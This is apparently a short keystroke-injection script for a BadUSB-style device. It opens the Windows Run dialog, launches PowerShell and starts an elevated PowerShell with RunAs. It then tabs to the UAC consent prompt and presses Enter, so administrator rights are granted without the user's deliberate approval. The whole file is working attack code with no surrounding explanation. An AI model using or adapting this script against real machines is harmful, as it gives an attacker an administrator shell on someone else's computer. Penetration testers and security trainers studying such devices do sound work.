layout('us')
press('GUI r')
delay(2000)
type("powershell.exe")
press("ENTER")
delay(3000)
type("Start-Process PowerShell -Verb RunAs; exit")
press("ENTER")
delay(5000)
press("TAB")
delay(500)
press("TAB")
delay(500)
press("ENTER")
delay(5000)
